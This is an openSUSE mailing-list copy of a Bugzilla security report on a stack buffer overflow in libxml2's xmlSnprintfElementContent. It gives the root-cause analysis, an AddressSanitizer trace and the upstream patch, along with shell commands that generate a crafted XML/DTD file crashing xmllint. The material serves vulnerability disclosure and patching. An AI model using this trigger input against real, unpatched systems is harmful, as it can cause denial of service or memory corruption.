Mailinglist Archive: opensuse-bugs (4295 mails)

< Previous Next >
[Bug 1039063] New: VUL-0: libxml2: stack overflow vulnerability (xmlSnprintfElementContent func in valid.c)
  • From: bugzilla_noreply@xxxxxxxxxx
  • Date: Mon, 15 May 2017 11:27:28 +0000
  • Message-id: <bug-1039063-21960@http.bugzilla.suse.com/>
http://bugzilla.suse.com/show_bug.cgi?id=1039063


Bug ID: 1039063
Summary: VUL-0: libxml2: stack overflow vulnerability
(xmlSnprintfElementContent func in valid.c)
Classification: openSUSE
Product: openSUSE Distribution
Version: Leap 42.2
Hardware: Other
OS: Other
Status: NEW
Severity: Normal
Priority: P5 - None
Component: Security
Assignee: security-team@xxxxxxx
Reporter: mikhail.kasimov@xxxxxxxxx
QA Contact: qa-bugs@xxxxxxx
Found By: ---
Blocker: ---

Ref: http://seclists.org/oss-sec/2017/q2/258
============================================
+++++++++++++++++++++++++++++++++++++++++++++++
+ 1) BUG 781333 - STACK OVERFLOW IN VALID.C
+ https://bugzilla.gnome.org/show_bug.cgi?id=781333
+++++++++++++++++++++++++++++++++++++++++++++++

Here is a quick analysis:
The function xmlSnprintfElementContent in valid.c is supposed to recursively
dump the element content definition into a
char buffer 'buf' of size 'size'. The variable len is assigned strlen(buf). If
the content->type is
XML_ELEMENT_CONTENT_ELEMENT, then (i) the content->prefix is appended to buf
(if it actually fits) whereupon (ii)
content->name is written to the buffer. However, the check whether the
content->name actually fits also uses 'len'
rather than the updated buffer length strlen(buf). This allows us to write
about "size" many bytes beyond the allocated
memory.

$ ./xmllint --version
/src/libxml2/.libs/lt-xmllint: using libxml version 20904-GITv2.9.4-16-g0741801
compiled with: Threads Tree Output Push Reader Patterns Writer SAXv1 FTP HTTP
DTDValid HTML Legacy C14N Catalog XPath
XPointer XInclude Iconv ISO8859X Unicode Regexps Automata Expr Schemas
Schematron Modules Debug

How to reproduce:
$ s=$(printf "%-757s" "0")
$ t=$(printf "%-4924s" "0")
$ echo '<!DOCTYPEa[<!ELEMENT a (F'"${s// /0}:${t// /0}"')><!ATTLIST a><!ELEMENT
b EMPTY><!ATTLIST b s CDATA
#IMPLIED>]><a/>' > bug1.xml
$ ./xmllint --valid bug1.xml
=================================================================
==17183==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fffb66dac88 at pc 0x7f2daa004f13 bp 0x7fffb66d9820 sp 0x7fffb66d9818
WRITE of size 4925 at 0x7fffb66dac88 thread T0
#0 0x7f2daa004f12 in xmlSnprintfElementContent__internal_alias
/src/libxml2/valid.c:1323:9
#1 0x7f2daa039d58 in xmlValidateElementContent /src/libxml2/valid.c:5445:6
#2 0x7f2daa039d58 in xmlValidateOneElement__internal_alias
/src/libxml2/valid.c:6152
#3 0x7f2daa49b106 in xmlSAX2EndElementNs__internal_alias
/src/libxml2/SAX2.c:2467:24
#4 0x7f2da9f1a4ca in xmlParseElement__internal_alias
/src/libxml2/parser.c:10212:3
#5 0x7f2da9f33758 in xmlParseDocument__internal_alias
/src/libxml2/parser.c:10962:2
#6 0x7f2da9f622f5 in xmlDoRead /src/libxml2/parser.c:15445:5
#7 0x7f2da9f622f5 in xmlCtxtReadFile__internal_alias
/src/libxml2/parser.c:15690
#8 0x521133 in parseAndPrintFile /src/libxml2/xmllint.c:2391:9
#9 0x5184cd in main /src/libxml2/xmllint.c:3772:7
#10 0x7f2da8eb382f in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#11 0x41d2b8 in _start (/src/libxml2/.libs/lt-xmllint+0x41d2b8)

Address 0x7fffb66dac88 is located in stack of thread T0 at offset 5128 in frame
#0 0x7f2daa032e5f in xmlValidateOneElement__internal_alias
/src/libxml2/valid.c:5943

This frame has 5 object(s):
[32, 82) 'fn.i' (line 5288)
[128, 5128) 'expr.i' (line 5441)
[5392, 10392) 'list.i' (line 5442) <== Memory access at offset 5128
partially underflows this variable
[10656, 10660) 'extsubset' (line 5950)
[10672, 10722) 'fn' (line 6063)
============================================

============================================
PATCHED BY:
--- a/valid.c
+++ a/valid.c
@@ -1270,6 +1270,7 @@ xmlSnprintfElementContent(char *buf, int size,
xmlElementContentPtr content, int
}
strcat(buf, (char *) content->prefix);
strcat(buf, ":");
+ len += xmlStrlen(content->prefix);
}
if (size - len < xmlStrlen(content->name) + 10) {
strcat(buf, " ...");
============================================

(open-)SUSE: https://software.opensuse.org/package/libxml2

2.9.4 (TW, 42.2, official repo)
2.9.1 (42.1, official repo)

Upstream report -- https://bugzilla.gnome.org/show_bug.cgi?id=781333 -- has
'private' status.

--
You are receiving this mail because:
You are on the CC list for the bug.
< Previous Next >
This Thread
  • No further messages